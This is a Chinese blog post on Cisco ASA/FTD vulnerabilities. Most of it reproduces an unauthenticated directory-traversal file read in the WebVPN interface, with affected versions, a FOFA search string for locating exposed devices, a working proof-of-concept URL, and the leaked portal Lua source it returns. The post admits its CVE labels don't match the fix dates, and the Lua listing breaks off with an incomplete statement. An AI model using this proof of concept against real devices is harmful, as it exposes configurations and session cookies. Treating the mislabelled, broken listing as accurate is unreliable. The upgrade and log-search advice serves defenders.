CVE-2021-40116|CVE-2021-34783等——Cisco多个安全漏洞

Posted 新网工李白



漏洞概述

2021年10月27日,Cisco发布安全公告,修复了 Cisco Firepower 威胁防御 (FTD)、Cisco 自适应安全设备 (ASA) 和 Firepower 管理中心 (FMC) 中的多个安全漏洞。

CISCO ASA远程任意文件读取

Cisco Adaptive Security Appliance (ASA)是思科的一种防火墙设备。

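Cisco Adaptive Security Appliance (ASA) 防火墙设备以及 Cisco Firepower Threat Defense (FTD) 设备的 Web 管理界面存在未授权(无需认证)的目录穿越漏洞,可被用于远程读取文件。攻击者只能查看 web 目录下的文件,无法通过该漏洞访问 web 目录之外的文件;可读取的内容包括 WebVPN 设备的配置信息、cookies 等。注意:下文影响版本表中的修复版本(例如 2020 年 8 月的 Hot Fix)早于上文 2021 年 10 月的公告日期,本节漏洞对应的 CVE 编号与修复版本请以 Cisco 官方公告为准。防护上应升级到对应的已修复版本;由于 cookies 可能已被读取,升级后建议使现有 WebVPN 会话失效。排查时可在 Web 访问日志中检索下文 POC 所示的、对 /+CSCOT+/translation-table 且 lang 参数含 ../ 的请求。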

影响版本

Cisco ASA 设备影响版本:

<9.6.1
9.6 < 9.6.4.42
9.71
9.8 < 9.8.4.20
9.9 < 9.9.2.74
9.10 < 9.10.1.42
9.12 < 9.12.3.12
9.13 < 9.13.1.10
9.14 < 9.14.1.10

Cisco FTD设备影响版本:

6.2.2
6.2.3 < 6.2.3.16
6.3.0 < Migrate to 6.4.0.9 + Hot Fix or to 6.6.0.1
6.4.0 < 6.4.0.9 + Hot Fix
6.5.0 < Migrate to 6.6.0.1 or 6.5.0.4 + Hot Fix (August 2020)
6.6.0 < 6.6.0.1

漏洞复现

FOFA语法

 “webVpn”

POC

https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../


-- Copyright (C) 2006-2014 by Cisco Systems, Inc.
-- Created by otrizna@cisco.com

-- X-Frame-Options: SAMEORIGIN asks browsers to refuse framing of this page by
-- other origins (clickjacking defence). ADD_HTTP_RESP_HEADER is a platform
-- function that is not defined in this file; presumably it adds the header to
-- the current HTTP response.
ADD_HTTP_RESP_HEADER("X-Frame-Options", "SAMEORIGIN");

-- Load shared portal helpers. Both paths are platform-internal; what each file
-- defines is not visible in this listing.
dofile("/+CSCOE+/include/common.lua")
dofile("/+CSCOE+/include/browser_inc.lua")

-- Comparator ordering two records by ascending "order" field, in the shape
-- table.sort expects. Not referenced anywhere else in the visible listing.
local function compare(a,b) return a["order"]<b["order"] end;

--- Stub that always answers false.
-- The argument is ignored. Judging by the name this gates the
-- internal-password logon field, but no caller is visible here.
-- @param name unused
-- @return false
function INTERNAL_PASSWORD_ENABLED(name)
   return false
end

--- Stub that always answers false.
-- The argument is ignored. Judging by the name this gates an on-screen
-- keyboard option, but no caller is visible here.
-- @param name unused
-- @return false
function CONF_VIRTUAL_KEYBOARD(name)
   return false
end

-- Page-wide settings, deliberately global (no `local`): any file sharing this
-- Lua state can read them. Their consumers are not visible in this listing.
asdm_custom_file = ""   -- empty string: nothing selected
custom_profile   = ""   -- empty string: nothing selected
no_inheritance   = false

--- Stores an integer metadata value on a session's data file.
-- Opens "/sessions/<index>/session_data" for writing and hands the handle to
-- io.set_metadata_int, a platform extension of the io library. If the file
-- cannot be opened, nothing is written and no error is reported.
--
-- NOTE(review): `index` is concatenated into the path without validation.
-- Confirm callers only pass server-generated session indexes; a value
-- containing "/" or ".." would resolve outside the intended session directory.
-- @param index session identifier used as the directory name
-- @param name  metadata key
-- @param value value passed to io.set_metadata_int
function SetSessionData(index,name,value)
   local session_file = io.open("/sessions/" .. index .. "/session_data", "w")
   if not session_file then
      return
   end

   io.set_metadata_int(session_file, name, value)
   session_file:close()
end

--- Reads an integer metadata value from a session's data file.
-- Opens "/sessions/<index>/session_data" for reading and queries it with
-- io.get_metadata_int, a platform extension of the io library.
--
-- NOTE(review): `index` is concatenated into the path without validation.
-- Confirm callers only pass server-generated session indexes; a value
-- containing "/" or ".." would resolve outside the intended session directory.
-- @param index session identifier used as the directory name
-- @param name  metadata key
-- @param value unused; kept so the signature mirrors SetSessionData
-- @return the first result of io.get_metadata_int, or nil when the file
--         cannot be opened
function GetSessionData(index,name,value)
   local session_file = io.open("/sessions/" .. index .. "/session_data", "r")
   if not session_file then
      return nil
   end

   local stored = io.get_metadata_int(session_file, name)
   session_file:close()
   return stored
end


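--- Emits an HTML ` value="..."` attribute for the given string.
-- Double quotes in the value are replaced with &quot; so the value cannot
-- close the attribute early. Nothing is emitted when value is nil or false.
--
-- The string escapes are written as \" here; the listing as published had
-- them doubled (\\"), which does not parse as Lua.
--
-- NOTE(review): only the double quote is escaped; "&", "<" and ">" pass
-- through unchanged. That is sufficient only while the attribute stays
-- double-quoted, as it is here.
-- @param value string to place in the attribute, or nil
function xValue(value)
   if value then
      -- keep only gsub's first result (the string), not the match count
      local ret = string.gsub(value,"\"","&quot;")
      OUT(" value=\""..ret.."\"")
   end
end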

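--- Escapes "&", "<" and ">" for use in HTML element content.
-- "&" is replaced first so the entities produced for "<" and ">" are not
-- escaped a second time.
--
-- Quotes are NOT escaped, so the result is not safe inside an attribute
-- value; use it for element content only.
-- @param value string to escape, or nil
-- @return the escaped string, or nil when value is nil or false
function shtml(value)
   if not value then
      return nil
   end

   -- `escaped` is local: the original assigned to an undeclared `ret`, which
   -- created a global shared by every caller in the same Lua state.
   local escaped = string.gsub(value, "&", "&amp;")
   escaped = string.gsub(escaped, "<", "&lt;")
   escaped = string.gsub(escaped, ">", "&gt;")
   return escaped
end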

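--- Splits a string on any of the characters in delim.
-- Empty pieces are dropped: "a,,b" split on "," gives {"a", "b"}.
--
-- delim is inserted unescaped into a Lua pattern character class
-- ("[^" .. delim .. "]+"), so pattern-magic characters such as "]", "^", "%"
-- and "-" must be escaped with "%" by the caller.
-- @param str   string to split
-- @param delim one or more delimiter characters
-- @return array of the non-empty pieces, in order
function explode(str,delim)
   -- string.gfind is the Lua 5.0 name of string.gmatch; use whichever exists
   local gmatch = string.gmatch or string.gfind

   -- the published listing lost the "{}" of this table constructor
   local ret = {}
   for val in gmatch(str, "[^"..delim.."]+") do
      table.insert(ret, val)
   end

   return ret
end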


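--- Returns the names of the session's URL lists as an array.
-- SESSION_URL_LISTS() is a platform function, not defined in this file; its
-- result is treated as a comma-separated string. Empty names are dropped.
-- @return array of list names; empty when the platform returns nil or ""
function GetUrlLists()
   -- string.gfind is the Lua 5.0 name of string.gmatch; use whichever exists
   local gmatch = string.gmatch or string.gfind

   -- the published listing lost the "{}" of this table constructor
   local url_lists = {}

   -- tolerate a nil result instead of raising inside the pattern iterator
   local url_lists_str = SESSION_URL_LISTS() or ""
   for url_list_name in gmatch(url_lists_str, "[^,]+") do
      table.insert(url_lists, url_list_name)
   end

   return url_lists
end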

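--- Splits a URL into its components.
-- Fields set when present: scheme, authority, path, params, query, userinfo,
-- host, port, user, password. Fields not found in the URL keep the value
-- given in `default`, if any.
--
-- The fragment is NOT split off (that code is commented out below), so a
-- "#fragment" stays attached to the query or the path.
--
-- No validation or decoding is performed: host and port are returned as raw
-- strings (port is not checked to be numeric) and percent-escapes are left
-- as-is. Callers that base access or routing decisions on these fields must
-- validate them themselves.
-- @param url     URL string
-- @param default optional table of default field values; it is copied, not
--                modified
-- @return table of components, or nil plus "invalid url" for a nil/empty url
function socket_url_parse(url, default)
    -- initialize default parameters
    -- (the published listing lost the "{}" of this table constructor)
    local parsed = {}
    for i,v in pairs(default or parsed) do parsed[i] = v end
    -- empty url is parsed to nil
    if not url or url == "" then return nil, "invalid url" end
    -- remove whitespace
    -- url = string.gsub(url, "%s", "")
    -- get fragment
--[[
    url = string.gsub(url, "#(.*)$", function(f)
        parsed.fragment = f
        return ""
    end)
--]]
    -- get scheme
    url = string.gsub(url, "^([%w][%w%+%-%.]*)%:",
        function(s) parsed.scheme = s; return "" end)
    -- get authority
    url = string.gsub(url, "^//([^/%?]*)", function(n)
        parsed.authority = n
        return ""
    end)
    -- get query string
    url = string.gsub(url, "%?(.*)", function(q)
        parsed.query = q
        return ""
    end)
    -- get params
    url = string.gsub(url, "%;(.*)", function(p)
        parsed.params = p
        return ""
    end)
    -- path is whatever was left
    if url ~= "" then parsed.path = url end
    local authority = parsed.authority
    if not authority then return parsed end
    -- everything before the first "@" is userinfo
    authority = string.gsub(authority,"^([^@]*)@",
        function(u) parsed.userinfo = u; return "" end)

    local ipv6 = false

    -- a bracketed host is an IPv6 literal; take it without the brackets so
    -- the colons inside it are not mistaken for the port separator
    if(string.sub(authority,1,1) == "[") then
       authority = string.gsub(authority,"^%[(.-)%]",
                               function(u) parsed.host = u; ipv6 = true; return "" end)
    end

    -- the text after the last ":" is the port
    authority = string.gsub(authority, ":([^:]*)$",
        function(p) parsed.port = p; return "" end)

    if authority ~= "" and not ipv6 then parsed.host = authority end
    local userinfo = parsed.userinfo
    if not userinfo then return parsed end
    -- split "user:password" at the last ":"
    userinfo = string.gsub(userinfo, ":([^:]*)$",
        function(p) parsed.password = p; return "" end)
    parsed.user = userinfo
    return parsed
end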



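--- Parses a URL and returns its scheme, host, port and request path.
-- Components missing from the URL come back as "" (the defaults passed to
-- socket_url_parse). The fourth result is the path with "?query" appended
-- when the query is non-empty.
--
-- No validation is applied to any component; see socket_url_parse.
-- @param url URL string
-- @return scheme, host, port, path-with-query; or nil when url is nil or ""
function ParseURL(url)

   -- every field defaults to "" so the concatenation below never sees nil
   -- (the published listing lost the braces of this table constructor)
   local durl = {
      url = "",
      scheme = "",
      authority = "",
      path = "",
      params = "",
      query = "",
      fragment = "",
      userinfo = "",
      host = "",
      port = "",
      user = "",
      password = ""
   }

   local nurl = socket_url_parse(url, durl)
   -- socket_url_parse returns nil for a nil or empty url; report that as nil
   -- instead of failing on the field accesses below
   if not nurl then return nil end

   local path = nurl.path
   local query = nurl.query or ""
   if query ~= "" then
      path = path .. "?" .. query
   end

   return nurl.scheme, nurl.host, nurl.port, path

end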


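--- Indexes application records by id and by the protocols they handle.
-- Every app is stored in the first result under app["id"]. An app that has a
-- "protocol" string and whose "mode" is not "disable" is also registered, in
-- the second result, under each alphanumeric word of that string.
--
-- When two apps name the same protocol, the one visited last wins; pairs()
-- does not guarantee a visiting order.
-- @param apps table of app records (fields read: id, protocol, mode)
-- @return app_info (id -> app record), protocol (protocol word -> app id)
function GetAppInfo(apps)
   -- string.gfind is the Lua 5.0 name of string.gmatch; use whichever exists
   local gmatch = string.gmatch or string.gfind

   -- the published listing lost the "{}" of both table constructors
   local protocol = {}
   local app_info = {}

   -- pairs() replaces the Lua 5.0-only "for k,v in tbl do" form
   for _, app in pairs(apps) do
      app_info[app["id"]] = app
      if nil ~= app["protocol"] and app["mode"] ~= "disable" then
         for p in gmatch(app["protocol"], "[%w]+") do
            protocol[p] = app["id"]
         end
      end
   end
   return app_info, protocol
end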

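--- Returns the logon form fields sorted by display order.
-- Each field is a table with id, name and order. The built-in order can be
-- overridden per field through CUSTOM("auth-page/form-order/<id>"); CUSTOM is
-- a platform function not defined in this file.
-- @return array of field tables, ascending by "order"
function GetLogonFields()

    -- the published listing lost the braces of this nested table constructor
    local fields = {
        { id = "group",              name = "Group",             order = 100 },
        { id = "username",           name = "Username",          order = 200 },
        { id = "password",           name = "Password",          order = 300 },
        { id = "internal-password",  name = "Internal Password", order = 400 },
        { id = "secondary-username", name = "Second Username",   order = 500 },
        { id = "secondary-password", name = "Second Password",   order = 600 },
    }

    for _, fld in ipairs(fields) do
        local order = CUSTOM("auth-page/form-order/" .. fld["id"])
        if  fld["id"] == "internal-password" and
            (not order or order == "") and
            CUSTOM("auth-page/logon-form/internal-password-first") == "yes" then
                order = 250 -- backward compatibility with the old customization setting
        end

        if (order and order ~= "") then
            -- keep the built-in order when the customized value is not a
            -- number; a nil order would make the sort comparator fail
            local numeric_order = tonumber(order)
            if numeric_order then fld["order"] = numeric_order end
        end
    end

    table.sort(fields, function (a, b) return a["order"] < b["order"] end)
    return fields
end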



function LOAD_URL_LIST(name,absolute_path,bookmark_number)
    
   local f
   local ret=
   local sso_enabled=0;
   local name_md5 = MD5(name) 
   
   if absolute_path and "" ~= absolute_path then
      f=io.open(absolute_path,"r")
   else
      f=io.open("/bookmarks/"..name_md5,"r")
   end


   if not f then return  end

   local function get_value(value)

      if not value then return nil end
      if string.len(value) == 0 then return "" end
      return string.sub(value,2) 
   end

   local path = "/url-list/"

   local function lget_value(textdomain,value)
      if nil == value then return nil end
      if string.len(value) == 0 then return "" end
      if string.sub(value,1,1) == '+' then
         if string.len(value) > 1 then
            return gettext.dgettext(textdomain,string.sub(value,2))
         else
            return ""
         end
      else
         return string.sub(value,2) 
      end
 
